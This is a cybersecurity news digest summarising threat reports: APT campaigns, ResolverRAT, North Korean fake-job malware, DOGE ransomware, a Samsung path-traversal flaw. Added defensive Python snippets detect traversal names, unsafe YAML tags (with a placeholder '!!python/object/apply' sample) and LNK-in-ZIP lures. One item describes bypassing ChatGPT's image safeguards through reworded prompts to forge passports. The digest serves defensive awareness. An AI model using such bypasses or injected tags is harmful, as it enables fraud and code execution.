Tuesday, Apr 15, 2025 // (IG): BB // GITHUB // SN R&D
Unverified Claims Surround Alleged U.S. Cyber Activities During Asian Winter Games
NOTE:
China’s recent decision to publicly name alleged U.S. NSA operatives and issue wanted notices over cyberattacks during the Asian Winter Games reflects more than just a tit-for-tat maneuver—it’s a striking example of imitation as the highest form of flattery. For years, the U.S. has led the charge in leveraging indictments as instruments of geopolitical signaling, unsealing charges against foreign hackers to name, shame, and isolate adversaries on the global stage. Now, Beijing is echoing that strategy almost to the letter, minus detailed accusations, technical claims, and high-profile targets. By attempting to replicate a democratic process, China isn’t just retaliating—it’s acknowledging, perhaps inadvertently, the effectiveness of the American playbook.
Bottom Line Up Front (BLUF): China has accused the U.S. National Security Agency (NSA) of conducting cyberattacks during the 2025 Asian Winter Games in Harbin, naming three individuals as operatives. While China has published wanted notices for these individuals and outlined technical attack methods, no independent evidence or confirmation has been provided to verify the identities, affiliations, or technical claims.
Analyst Comments: The Chinese government is ramping up pressure in the ongoing cyber conflict narrative with the U.S. by naming alleged foreign operatives and detailing methods such as exploiting Microsoft Windows backdoors. However, without forensic data, logs, or malware samples released publicly, these claims cannot be verified by the international cybersecurity community. The allegations may serve diplomatic and political functions more than evidentiary ones. This trend of attributing specific actors without third-party validation highlights growing cyber-sovereignty posturing and strategic signaling between great powers.
FROM THE MEDIA: The Chinese Foreign Ministry and Harbin’s Public Security Bureau publicly accused three U.S. citizens of orchestrating cyberattacks under the NSA’s “Tailored Access Operations (TAO) unit”. These individuals were named in official wanted notices, which offered monetary rewards for information. Chinese cybersecurity agency CVERC claims the attacks targeted critical infrastructure in Heilongjiang Province during the 9th Asian Winter Games and exploited alleged pre-installed backdoors in Windows systems. China also implicated the University of California and Virginia Tech but did not clarify how they were involved. As of now, no U.S. government or university has responded, and no independent cybersecurity firms have corroborated the technical claims or the individuals’ affiliations.
READ THE STORY: Reuters // Global Times
India’s Opportunity in Trump’s Tariffs Lies in Low-End Manufacturing, Not Tech Glory
Bottom Line Up Front (BLUF): With U.S. tariffs now hitting Chinese exports at 125%, India finds itself in a rare position to absorb supply chains—especially in low-end manufacturing. While high-tech sectors like semiconductors and smartphones remain exempt (for now), smaller, easily relocatable industries such as household goods, appliances, and toys are ripe for transition. India should act decisively to attract foreign firms priced out of China, offering incentives and clear relocation pathways.
Analyst Comments: Trump’s aggressive tariff policies—particularly against China—present India with a time-sensitive window to attract manufacturers seeking alternatives. However, focusing on complex industries like chips or smartphones may overestimate India’s short-term capabilities. Instead, targeting “footloose” sectors with simpler supply chains offers a faster win. India’s scale, workforce, and maturing infrastructure give it a compelling value proposition, but it must act fast to compete with Vietnam and others already ahead in the relocation race. Proactive policy—such as SEZ incentives, relocation subsidies, and fast-track approvals—could be the difference between seizing and squandering this geopolitical tailwind.
FROM THE MEDIA: While smartphones and semiconductors are largely excluded from the 125% reciprocal tariff, simpler goods like vacuum flasks, toys, and festive decorations face steep new barriers into the U.S. from China. These industries, often comprised of smaller factories, are already looking to move due to rising costs in China. India, Harding suggests, should aggressively court these businesses with tours, subsidies, and policy clarity to ensure they pick Indian soil over Southeast Asia. Meanwhile, India must also contend with internal economic headwinds—particularly the Reserve Bank of India’s crackdown on unsecured consumer credit, which has slowed growth despite relatively modest household debt levels. In the broader picture, India’s economy is still on track to surpass Japan’s GDP by 2026, according to IMF forecasts.
READ THE STORY: FT
Chinese APTs Exploit Endpoint Blind Spots to Breach U.S. Infrastructure, Experts Warn
Bottom Line Up Front (BLUF): Chinese state-backed advanced persistent threat (APT) groups are increasingly exploiting visibility gaps in Endpoint Detection and Response (EDR) systems to infiltrate critical U.S. infrastructure. These attackers focus on under-monitored assets like firewalls, IoT devices, and cloud services, using stealthy tactics that evade traditional security tools. Experts urge organizations to modernize defenses with AI, threat hunting, and comprehensive network visibility strategies to close these gaps.
Analyst Comments: The revelation that Chinese APT groups such as Volt Typhoon and Salt Typhoon are actively leveraging EDR blind spots reflects a significant evolution in state-sponsored cyber-espionage strategy. Instead of focusing solely on endpoints, these actors are targeting edge infrastructure, legacy devices, and “smart” systems that often fall outside traditional monitoring scopes. The reported confirmation from Chinese officials that these attacks are retaliatory responses to U.S. Taiwan policy further underscores the geopolitical motivation behind this cyber activity. As AI-enhanced cyber operations become more prevalent, enterprises must integrate identity, network, and behavioral telemetry to detect lateral movement across hybrid environments—especially in sectors like utilities, telecom, and defense.
FROM THE MEDIA: These groups are reportedly focusing on edge devices, IoT systems, and other under-monitored assets to carry out long-term, undetected cyber-espionage campaigns. During Google Cloud Next 2025, Sandra Joyce of Google Threat Intelligence described China as a rising “cyber superpower,” leveraging this gap to infiltrate critical U.S. infrastructure. According to Armis Labs, 79% of U.S. IT decision-makers now identify China as the top cyber threat. Experts like Aaron Shelmire of Abstract Security and Andrew Grealy of Armis Labs recommend combining EDR with identity access controls, anomaly detection, AI, and threat hunting. They warn that failing to modernize security strategies will leave organizations vulnerable to increasingly sophisticated and stealthy intrusions backed by nation-state capabilities.
READ THE STORY: DR
CVE-2024-49421: Samsung Galaxy S24 Quick Share Flaw Enables Unauthorized File Creation
Bottom Line Up Front (BLUF): A directory traversal vulnerability in Samsung’s Quick Share app (CVE-2024-49421) affects Galaxy S24 devices, allowing nearby attackers to write arbitrary files to user-accessible directories. Discovered by NCC Group and disclosed through ZDI, the flaw has been patched in Samsung’s December 2024 Security Maintenance Release, but unpatched devices remain at risk of data manipulation or privilege escalation.
Analyst Comments: While CVE-2024-49421 carries a medium CVSS score (5.9), its potential impact on user data integrity and security is notable, particularly given Quick Share’s widespread deployment on millions of Galaxy S24 devices. Although the exploit requires local network access and some user interaction, its use in combination with phishing or malware could enable lateral movement or system tampering. The vulnerability underscores the importance of enforcing secure input validation and maintaining rigorous update hygiene, especially for pre-installed mobile applications that often operate with elevated privileges. Enterprises with BYOD policies should ensure mobile device updates are enforced and file-sharing features are monitored or restricted.
FROM THE MEDIA: The flaw was discovered by Ken Gannon of NCC Group and allows attackers with network proximity to create arbitrary files on a target device by manipulating file paths. The vulnerability stems from insufficient validation of user-supplied paths in Quick Share, which enables writing files outside intended directories. Samsung issued a fix in its December 2024 Security Maintenance Release, but the flaw remained under coordinated disclosure until April 2025. Samsung urged users to apply the update and enable auto-update settings. While no active exploitation has been confirmed, experts warn that delayed patching could expose devices to data tampering, privilege escalation, or ransomware deployment.
READ THE STORY: GBhackers
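The CVE-2024-49421 write-up above describes the defect as insufficient validation of a peer-supplied file path, which lets a received file land outside the intended directory. The following Python snippet is an added illustration, not Samsung's code or NCC Group's finding: it contrasts the naive join pattern with a hardened one that normalises the name, rejects absolute and traversing names, and confirms the resolved path still sits under the receive directory. The receive directory (`SHARE_ROOT`) is a constructed temp folder, and the function names are assumptions for the example.

```python
import os
import posixpath
import tempfile

# Constructed receive directory standing in for the app's share folder.
SHARE_ROOT = tempfile.mkdtemp(prefix="quickshare_demo_")


def naive_target_path(share_root: str, requested_name: str) -> str:
    """Vulnerable pattern: the peer-supplied name is joined onto the receive
    directory without validation, so "../../x" walks out of share_root."""
    return os.path.join(share_root, requested_name)


def naive_escapes(share_root: str, requested_name: str) -> bool:
    """True when the naive join resolves outside share_root."""
    root = os.path.realpath(share_root)
    target = os.path.realpath(naive_target_path(share_root, requested_name))
    try:
        return os.path.commonpath([root, target]) != root
    except ValueError:  # different drives on Windows: definitely outside
        return True


def safe_target_path(share_root: str, requested_name: str) -> str:
    """Hardened pattern: normalise the name, reject absolute or traversing
    names, then confirm the resolved path is still under share_root."""
    root = os.path.realpath(share_root)
    if not requested_name or "\x00" in requested_name:
        raise ValueError("empty name or NUL byte")
    # Normalise both separator styles so "..\\..\\x" is caught as well.
    norm = posixpath.normpath(requested_name.replace("\\", "/"))
    if norm in (".", "..") or norm.startswith("/") or norm.startswith("../"):
        raise ValueError(f"rejected name: {requested_name!r}")
    candidate = os.path.realpath(os.path.join(root, norm))
    # Containment check after resolution catches anything normpath missed,
    # such as a symlinked subdirectory pointing outside the share root.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"resolved path escapes share root: {candidate}")
    return candidate


def is_accepted(share_root: str, requested_name: str) -> bool:
    """Convenience wrapper: does the hardened check accept this name?"""
    try:
        safe_target_path(share_root, requested_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("photo.jpg", "../../Download/payload", "..\\..\\x", "/etc/hosts"):
        print(f"{name!r:28} naive escapes={naive_escapes(SHARE_ROOT, name)} "
              f"hardened accepts={is_accepted(SHARE_ROOT, name)}")
```

The second containment check after `realpath` is deliberate: string-level normalisation alone does not account for symlinks already present under the receive directory, so the resolved path is verified against the resolved root as the last step.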
ResolverRAT Targets Global Healthcare and Pharma Sectors via Sophisticated Phishing Campaign
Bottom Line Up Front (BLUF): A new remote access trojan dubbed ResolverRAT has been discovered targeting the healthcare and pharmaceutical industries through region-specific phishing campaigns and DLL side-loading. According to Morphisec Labs, the malware leverages multi-stage, in-memory execution and advanced evasion techniques to maintain stealthy, persistent access to infected systems.
Analyst Comments: ResolverRAT demonstrates how modern cybercrime groups are blending traditional tactics—like phishing—with advanced stealth techniques to compromise high-value industries. The use of localized lures and in-memory payload delivery reflects a professional, multinational operation, possibly operated by a cybercrime-as-a-service (CaaS) affiliate network. While attribution remains unclear, the infrastructure overlap with known stealer campaigns (e.g., Lumma, Rhadamanthys) suggests shared toolkits or operational collaboration. Given the malware’s stealth, fallback mechanisms, and use of certificate-based C2 communication, organizations in healthcare and pharma should immediately audit systems for signs of lateral movement, registry abuse, and unusual encrypted traffic.
FROM THE MEDIA: Researchers at Morphisec Labs uncovered a new RAT known as ResolverRAT, which has been targeting organizations in the healthcare and pharmaceutical sectors. The attack campaign, observed as recently as March 10, uses phishing emails written in localized languages including Hindi, Turkish, Italian, Portuguese, and others to maximize infection rates globally. These emails rely on urgency-based themes such as legal action or copyright violations to coax users into downloading a malicious file, which initiates the execution chain through DLL side-loading. The malware is deployed via a decrypted in-memory loader and never touches the disk, complicating detection.
READ THE STORY: THN
EU Explores Legal Path to Exit Russian Gas Contracts Without Paying Penalties
Bottom Line Up Front (BLUF): The European Commission is examining legal options—including invoking force majeure—to allow energy companies to exit long-term gas contracts with Russia without paying termination fees. The move is part of a broader effort to eliminate Russian fossil fuel imports by 2027 and cut revenue streams funding Moscow’s war in Ukraine. However, legal, political, and economic complexities threaten to stall the plan.
Analyst Comments: Brussels’ latest effort reflects the EU’s enduring dilemma: maintaining energy security while sanctioning Russia’s war economy. While pipeline gas imports have sharply declined since 2022, Russian LNG imports have surged, revealing the limitations of voluntary divestment. The idea of invoking force majeure is legally fraught, especially with varied, confidential contract terms and the lack of a unified legal standard across EU jurisdictions. Political pushback from Russia-leaning member states like Hungary and Slovakia further complicates matters. In parallel, the EU’s consideration of gas-related concessions in U.S. trade negotiations underscores how energy policy is increasingly shaped by geopolitical leverage rather than economic logic.
FROM THE MEDIA: The European Commission is analyzing existing long-term gas contracts between EU firms and Russian suppliers to determine if force majeure or other legal tools can justify breaking the agreements without compensating Moscow. The goal is to cut Russian gas out of the EU energy mix entirely by 2027. Despite steep declines in pipeline gas imports—down from nearly 40% in 2022 to 11% today—Russian LNG deliveries have grown by 60% in the past three years. The EU still paid nearly €22 billion to Russia for energy between February 2024 and 2025. Legal complexity, confidential contracts, and pushback from Hungary and Slovakia have delayed a formal road map on phasing out Russian gas. As an alternative, think tanks such as Bruegel have proposed EU-wide tariffs, which would require only a qualified majority vote rather than unanimity. Meanwhile, the U.S. has emerged as the EU’s top LNG supplier, with gas imports increasingly factoring into trade talks with the Trump administration.
READ THE STORY: FT
ChatGPT Image Generator Abused to Forge Fake Passports, Says 2025 Cato CTRL Report
Bottom Line Up Front (BLUF): The 2025 Cato CTRL Threat Report has revealed that OpenAI’s ChatGPT image generator is being exploited to create highly realistic fake passports, enabling low-skill cybercriminals to bypass traditional identity verification systems. This marks a significant escalation in document-based fraud, highlighting the urgent need for advanced verification technologies beyond static photo ID checks.
Analyst Comments: The abuse of generative AI tools like ChatGPT for producing fake identification documents illustrates how the democratization of AI can empower a new class of "zero-knowledge" threat actors—individuals with little to no technical expertise but significant intent to defraud. This development poses a substantial challenge for financial services, healthcare, and legal sectors, which increasingly rely on digital KYC (Know Your Customer) processes. The ability to manipulate AI safeguards through prompt engineering demonstrates how generative models can be subverted, raising critical concerns for model alignment and content moderation. Identity verification systems must now evolve beyond surface-level checks and incorporate liveness detection, NFC document scanning, and hardware-based security anchors.
FROM THE MEDIA: By rephrasing prompt requests—such as asking the AI to design a "business card styled like a passport"—threat actors are bypassing built-in restrictions and producing visually convincing forgeries. These AI-generated documents feature realistic overlays, stamp placements, and design elements that require no technical knowledge or access to black-market resources. This accessibility has enabled a wave of fraud involving fake identities, including new account creation, account takeover, insurance and medical fraud, and legal document manipulation. The report emphasizes that standard methods of identity verification are now insufficient against such tactics, urging industries to adopt more secure alternatives like NFC chip validation, biometric liveness checks, and tamper-proof digital IDs. The rise of AI-fueled identity fraud signals a critical inflection point in the cybercrime landscape, with far-reaching implications for regulatory compliance, fraud detection, and digital trust.
READ THE STORY: GBhackers
Chinese Authorities Intensify Digital Surveillance in Tibet, Arrest Dozens Over Phone and Internet Use
Bottom Line Up Front (BLUF): According to Human Rights Watch, over 60 Tibetans have been arrested in China since 2021 for phone and internet-related activity, including social media use and possession of unauthorized religious content. The arrests are part of an intensifying surveillance regime in Tibetan regions, where police routinely search phones, monitor online platforms, and enforce bans on unapproved digital content.
Analyst Comments: China’s strategy of digital repression in Tibet closely mirrors its policies in Xinjiang, relying on a combination of mass phone surveillance, data-harvesting apps, and vague legal justifications to detain individuals. These measures are not only designed to suppress dissent but to eliminate cultural and religious expressions that counter official narratives. The reported use of spyware-like fraud prevention apps raises new concerns about state-sponsored mobile surveillance capabilities, including persistent access to sensitive data and device control. This approach reflects a broader blueprint for authoritarian digital control that may be exported or adopted in other regions facing similar political dissent.
FROM THE MEDIA: Offenses include sharing unauthorized religious content, promoting the Tibetan language, creating unapproved social media groups, and communicating with people outside the country. Many of these arrests stem from possession of materials linked to Buddhist leaders, or criticism of Mandarin language requirements in schools. The crackdown intensified following mass phone searches and “political education” detentions that began in 2021. Researchers noted that Chinese authorities especially monitor digital activity around protests, such as those in Sichuan against dam construction in 2024. A government-mandated app, allegedly for fraud prevention, has been used to conduct surveillance, allowing deep access to mobile devices. Human rights groups have drawn parallels between these practices and China’s treatment of Uyghurs in Xinjiang. The report follows renewed international concern after the death in Chinese custody of a prominent Tibetan monk who fled to Vietnam in 2024.
READ THE STORY: The Record
North Korean Group ‘Slow Pisces’ Targets Crypto Developers with Stealthy Python Malware
Bottom Line Up Front (BLUF): A DPRK-linked threat actor, Slow Pisces (aka Jade Sleet/TraderTraitor), is using fake job offers to deliver malware disguised as coding challenges to cryptocurrency developers. The campaign, analyzed by Palo Alto Networks' Unit 42, involves delivering trojanized Python and JavaScript projects via GitHub, leading to the deployment of an infostealer malware known as RN Stealer, primarily targeting macOS systems.
Analyst Comments: This campaign combines highly targeted social engineering with platform abuse (e.g., GitHub, LinkedIn) to reach technical users in the cryptocurrency space. Unlike wide phishing attacks, this approach allows adversaries to tightly control delivery and tailor payloads to high-value victims. The use of YAML and EJS for code execution reflects efforts to evade traditional detection mechanisms. As North Korean APTs evolve operational security, defenders should monitor not just payloads, but also developer interaction points such as hiring platforms and open-source repositories.
FROM THE MEDIA: The attackers targeted cryptocurrency developers via LinkedIn by posing as employers and sharing coding challenges containing malware. Victims were tricked into downloading GitHub-hosted Python or JavaScript projects, which stealthily delivered malware in stages. Unit 42 identified two primary tools: RN Loader (initial reconnaissance and payload retrieval) and RN Stealer (a macOS infostealer targeting sensitive files like SSH keys, iCloud Keychain data, and cloud config files). The attackers use evasive tactics such as YAML deserialization and dynamic payload delivery based on IP, geolocation, and request headers. Unlike other North Korean operations, Slow Pisces exercises tight operational control, delivering second-stage payloads only when specific victim criteria are met.
READ THE STORY: THN
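The Slow Pisces item above notes YAML deserialization as one of the execution tricks hidden in trojanized Python projects. The Python snippet below is an added example, not Unit 42's analysis or any sample from the campaign: it shows the defensive pattern a developer reviewing an unfamiliar "coding challenge" would want, namely scanning a YAML document for the `python/*` tag family before parsing and then parsing only with `yaml.safe_load`, which has no constructor for those tags. The two YAML documents are constructed, the callable name in the tagged one is a placeholder, and PyYAML is assumed to be available only when a real parse is requested.

```python
import re

# Tag forms whose constructors instantiate arbitrary Python objects or resolve
# arbitrary callables. PyYAML's full/unsafe loaders honour them; safe_load
# has no constructor for them and raises instead.
UNSAFE_YAML_TAG = re.compile(
    r"(?:!!python/|tag:yaml\.org,2002:python/)(?:object|name|module)\b"
)


def find_unsafe_tags(text: str) -> list:
    """Return the distinct unsafe tag prefixes present in a YAML document."""
    return sorted({m.group(0) for m in UNSAFE_YAML_TAG.finditer(text)})


def load_untrusted_yaml(text: str):
    """Refuse documents carrying python/* tags, then parse with safe_load only.
    Raises ValueError on unsafe input; RuntimeError if PyYAML is missing."""
    found = find_unsafe_tags(text)
    if found:
        raise ValueError(f"refusing YAML with unsafe tags: {found}")
    try:
        import yaml  # PyYAML; assumed installed when parsing is actually needed
    except ImportError as exc:
        raise RuntimeError("PyYAML not installed") from exc
    return yaml.safe_load(text)


def is_refused(text: str) -> bool:
    """True when the guard rejects the document before any parser runs."""
    try:
        load_untrusted_yaml(text)
    except ValueError:
        return True
    except RuntimeError:
        return False  # guard passed; only the optional parser was missing
    return False


# Constructed samples: a benign project config and one carrying a python/* tag
# (the callable name is a placeholder, not a real payload).
BENIGN_CONFIG = """\
project: coding-challenge
entrypoint: app.py
dependencies:
  - requests
"""

TAGGED_CONFIG = """\
project: coding-challenge
hook: !!python/object/apply:some.module.callable []
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_CONFIG), ("tagged", TAGGED_CONFIG)):
        print(label, "unsafe tags:", find_unsafe_tags(doc), "refused:", is_refused(doc))
```

The pre-parse scan is a belt-and-braces layer: `safe_load` would already reject the tagged document, but an explicit check produces a clear log line and protects code paths where someone later swaps in `yaml.load` with a permissive loader.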
Taiwan Charges Chinese Ship Captain in Undersea Cable Sabotage Case Amid Rising Tensions
Bottom Line Up Front (BLUF): Taiwanese authorities have formally charged the Chinese captain of the Hong Tai 58, a Togo-flagged cargo ship, for damaging a subsea telecommunications cable between Taiwan and the Penghu Islands. The charge follows growing concerns over cable disruptions in the region, which Taipei officials have linked to possible acts of Chinese hybrid warfare.
Analyst Comments: This is the first time Taiwan has brought formal legal action in response to the repeated disruption of its critical undersea infrastructure, signaling a shift from diplomatic caution to direct confrontation. While no direct link to Chinese state directives has been established, the incident mirrors suspected sabotage operations in other geopolitically sensitive regions, such as the Baltic Sea. It also coincides with heightened cyber and military activity from Beijing, suggesting a potential multi-domain campaign aimed at destabilizing Taiwan’s communications and asserting strategic pressure ahead of possible escalations in the Taiwan Strait.
FROM THE MEDIA: Taiwan charged the Chinese captain of the Hong Tai 58 with intentionally damaging a subsea cable connecting Taiwan to the Penghu Islands. The incident occurred in February 2025 when the vessel allegedly dropped and dragged its anchor, severing a critical telecommunications link. While Taiwan has experienced nearly a dozen similar incidents in recent years, this marks the first time charges have been filed. Authorities noted that the captain, identified only by the surname Wang, showed a “bad attitude” and refused to reveal ownership details of the vessel. The other seven crew members—all Chinese nationals—were not charged and are set to be deported. The Taiwanese government has long warned of hybrid warfare tactics by China, including cyberattacks and covert influence operations, and officials have raised concerns that these cable incidents may form part of a larger strategic campaign.
READ THE STORY: The Record
State-Backed Hackers Target Maritime Tech in Espionage Campaigns, Norma Cyber Warns
Bottom Line Up Front (BLUF): A new 2025 threat assessment by Norway's Norma Cyber has identified state-sponsored cyber espionage as a major threat to the maritime technology sector. The report warns that hacker groups linked to Russia, China, and India are actively targeting ship technology firms to acquire advanced systems for military and economic use—focusing on navigation, communication, robotics, and autonomous vessel technologies.
Analyst Comments: This warning signals a widening front in global cyber-espionage campaigns, where strategic sectors like shipping—once overlooked—are becoming high-value targets. The push toward autonomous and green shipping technology has drawn attention from adversarial states seeking both military advantages and civilian innovation. Russian actors, especially Fancy Bear, appear to be shifting from tactical military disruptions to strategic tech theft, while China continues its long-term intelligence-gathering strategy via groups like Mustang Panda. As maritime digitalization accelerates, security must evolve beyond vessel-level protections to include shore-based infrastructure and supply chain systems.
FROM THE MEDIA: Norma Cyber, a Norwegian cyber resilience center backed by the Norwegian Shipowners’ Association and DNK, released a report warning that the maritime technology sector is facing an escalating threat from state-backed hackers. The report identifies Russian group Fancy Bear and Chinese group Mustang Panda as active espionage actors targeting navigation, communication, and robotic systems used in shipping. The actors typically infiltrate corporate infrastructure rather than the ships themselves, aiming to exfiltrate data from shore-based R&D and operations networks. Russia, cut off from Western military tech due to sanctions, is reportedly using cyber means to bypass traditional supply chains. Chinese hackers have focused on underwater and autonomous vessel tech, deploying malware via infected USBs to maintain stealthy access. Norma’s CTO stressed that cybersecurity must keep pace with the industry's rapid digital transformation.
READ THE STORY: Trade Winds
DOGE 'Big Balls' Ransomware Leverages LNK Shortcuts, BYOVD, and Psychological Warfare in Sophisticated Campaign
Bottom Line Up Front (BLUF): A newly identified ransomware strain known as DOGE "Big Balls" is actively exploiting ZIP-based LNK shortcuts and Bring Your Own Vulnerable Driver (BYOVD) techniques to deliver stealthy, targeted attacks. The campaign, which employs psychological tactics and advanced anti-analysis features, uses an old Intel driver vulnerability (CVE-2015-2291) to escalate privileges and deploy ransomware with geolocation targeting and post-encryption capabilities.
Analyst Comments: DOGE Big Balls represents a disturbing evolution in ransomware tactics by blending technical exploitation, such as kernel-level privilege escalation through BYOVD, with social engineering aimed at psychological intimidation. The use of LNK shortcuts inside ZIP files—masquerading as financial documents—ensures a high initial click-through rate. Meanwhile, the inclusion of targeted geolocation via the Wigle.net API and name-dropping of real individuals in the ransom note points to a highly personalized and potentially reputation-damaging strategy. The embedded Havoc C2 beacon suggests this ransomware may also serve dual purposes: encryption for extortion and persistent access for espionage or secondary exploitation.
FROM THE MEDIA: The DOGE Big Balls ransomware campaign begins with a ZIP archive, often themed around finance-related topics like “Pay Adjustment.zip.” Inside is an LNK file disguised as a document, which executes PowerShell commands when clicked. These commands determine if the user has admin privileges and accordingly deploy either a disguised ransomware payload (“Adobe Acrobat.exe”) or install persistence in a user-specific startup directory. The attack incorporates a kernel exploit tool, ktool.exe, that abuses CVE-2015-2291, a vulnerability in an Intel driver, to disable logging and evade security controls. The ransomware collects system and network data—including BSSID-based geolocation using the Wigle.net API—before encrypting files and appending a “.flocked” extension. It drops ransom notes demanding Monero and referencing real names, possibly to mislead or intimidate victims. Additionally, the malware plants a Havoc C2 beacon, indicating the potential for long-term control or exfiltration. Anti-analysis tactics such as environment checks, obfuscated PowerShell scripts, and deletion of shadow copies are used throughout the attack chain.
READ THE STORY: GBhackers
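The DOGE Big Balls item above describes the initial lure as a finance-themed ZIP holding an LNK file disguised as a document. The Python snippet below is an added example for mail-gateway or sandbox triage, not code from the reported campaign or from GBhackers: it opens an archive in memory, flags entries that are shortcuts by extension, entries whose "document" name ends in a hidden `.lnk`, and entries whose bytes carry the shell-link header regardless of what they are called. The sample archive is constructed here with a bare LNK header plus padding (not a working shortcut) purely so the detector has something to inspect.

```python
import io
import zipfile

# Shell link (.lnk) file header: HeaderSize 0x4C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in little-endian byte order.
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def triage_zip(data: bytes) -> list:
    """Return one finding per suspicious archive entry: {"name", "reasons"}."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            lower = info.filename.lower()
            reasons = []
            if lower.endswith(".lnk"):
                reasons.append("shortcut (.lnk) inside archive")
                # "Pay Adjustment.pdf.lnk" shows as a PDF when extensions are hidden.
                if lower[:-4].endswith(DOCUMENT_EXTS):
                    reasons.append("double extension mimics a document")
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            if head == LNK_MAGIC:
                reasons.append("content is a shell link header")
                if not lower.endswith(".lnk"):
                    reasons.append("extension hides the shortcut")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def has_shortcut_lure(data: bytes) -> bool:
    """Verdict helper: any entry that is a shortcut dressed up as a document."""
    lure = {"double extension mimics a document", "extension hides the shortcut"}
    return any(lure & set(f["reasons"]) for f in triage_zip(data))


def build_sample_zip() -> bytes:
    """Constructed archive modelled on the reported 'Pay Adjustment.zip' theme."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Pay Adjustment.pdf.lnk", LNK_MAGIC + b"\x00" * 64)
        zf.writestr("Pay Adjustment/notes.txt", b"plain text, benign")
        zf.writestr("Pay Adjustment/summary.pdf", LNK_MAGIC + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
```

Checking the header bytes rather than only the extension matters because the second constructed entry, `summary.pdf`, would pass an extension-only filter while still being a shortcut once Explorer is asked to open it.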
Enterprise Browser Extensions Pose Critical Data Security Risk, LayerX Report Warns
Bottom Line Up Front (BLUF): LayerX's Enterprise Browser Extension Security Report 2025 has revealed that browser extensions pose a significant and often underestimated risk to corporate cybersecurity. With 99% of enterprise users relying on browser extensions—more than half of which can access sensitive data such as cookies, credentials, and internal web content—organizations face mounting threats from unvetted, outdated, or malicious third-party code embedded directly in their users’ browsers.
Analyst Comments: Browser extensions have become the new shadow IT: ubiquitous, minimally governed, and capable of accessing highly sensitive data. The LayerX report confirms what many security teams have suspected—extensions are an exploitable weak point in the enterprise software stack. The threat is amplified by the rise of GenAI productivity tools, which often require intrusive permissions to function. Moreover, the lack of transparency in publisher identities and widespread use of sideloaded or abandoned extensions increases the likelihood of supply chain compromise or latent exploitation. Organizations must incorporate browser extension telemetry into their broader attack surface management strategy and adopt continuous monitoring frameworks that extend to browser-layer activity.
FROM THE MEDIA: A new report from LayerX, the Enterprise Browser Extension Security Report 2025, reveals that browser extensions pose a major but often overlooked cybersecurity risk in enterprise environments. The report found that 99% of employees use extensions—over half of which can access sensitive data such as cookies, credentials, and internal web content. Many of these extensions are published by anonymous developers, with 54% registered using only Gmail accounts and 79% releasing just one extension. Additionally, 51% of extensions haven’t been updated in over a year, and 26% are sideloaded, bypassing security reviews. GenAI tools add further risk, with 20% of users having at least one installed and 58% of those carrying high-risk permissions. LayerX urges organizations to audit, categorize, and assess extension risks, and to implement adaptive, policy-based enforcement to reduce exposure from this growing threat vector.
READ THE STORY: THN
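The LayerX item above recommends auditing, categorising and risk-rating extensions by what they can reach. The Python snippet below is an added example of how a security team might score extension manifests collected from endpoints; it is not LayerX's methodology or tooling. The high-risk permission set, the broad-host patterns and the three-level rating are assumptions chosen for this example, as is the heuristic that a manifest without `update_url` was sideloaded rather than store-installed. Both manifests are constructed.

```python
import json

# Assumed risk mapping for this example: permissions that expose cookies,
# credentials, traffic or page content, the data classes the report highlights.
HIGH_RISK = {"cookies", "webRequest", "webRequestBlocking", "debugger",
             "nativeMessaging", "history", "clipboardRead", "management",
             "scripting", "webNavigation"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def assess_manifest(manifest_json: str) -> dict:
    """Rate one extension manifest (MV2 or MV3) as low, medium or high."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", []))
    hosts = set(m.get("host_permissions", []))
    # MV2 manifests list host patterns inside "permissions"; split them out.
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    perms -= hosts
    high = sorted(perms & HIGH_RISK)
    broad = bool(hosts & BROAD_HOSTS)
    # Assumption: store-packaged builds carry an update_url; absence suggests sideloading.
    sideloaded = "update_url" not in m
    if high and broad:
        level = "high"      # sensitive API plus access to every site
    elif high or broad:
        level = "medium"
    else:
        level = "low"
    return {"name": m.get("name", "?"), "level": level,
            "high_risk_permissions": high, "broad_host_access": broad,
            "likely_sideloaded": sideloaded}


def summarise(manifests) -> dict:
    """Count extensions per rating level across an inventory."""
    counts = {"low": 0, "medium": 0, "high": 0}
    for doc in manifests:
        counts[assess_manifest(doc)["level"]] += 1
    return counts


# Constructed manifests: a GenAI helper wanting everything, and a narrow tool.
GENAI_HELPER = json.dumps({
    "manifest_version": 3, "name": "AI Writing Helper",
    "permissions": ["cookies", "scripting", "storage"],
    "host_permissions": ["<all_urls>"],
})
COLOR_PICKER = json.dumps({
    "manifest_version": 3, "name": "Colour Picker",
    "permissions": ["activeTab"],
    "update_url": "https://clients2.google.com/service/update2/crx",
})

if __name__ == "__main__":
    for doc in (GENAI_HELPER, COLOR_PICKER):
        print(assess_manifest(doc))
    print(summarise([GENAI_HELPER, COLOR_PICKER]))
```

Feeding the inventory through `summarise` gives the per-level counts a policy engine needs; the natural next step is blocking or re-reviewing anything rated high that is also flagged as likely sideloaded.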
Trump FCC Chief Pressures Europe to Choose Starlink Over Chinese Tech Amid Global Telecom Divide
Bottom Line Up Front (BLUF): Brendan Carr, the newly reappointed Federal Communications Commission (FCC) chair under President Donald Trump, has warned European allies to align with U.S. technology—specifically Starlink—over Chinese communications infrastructure. As Europe weighs options for satellite broadband expansion, Carr urged EU nations to choose sides in what he framed as a growing technological divide between the U.S. and the Chinese Communist Party (CCP).
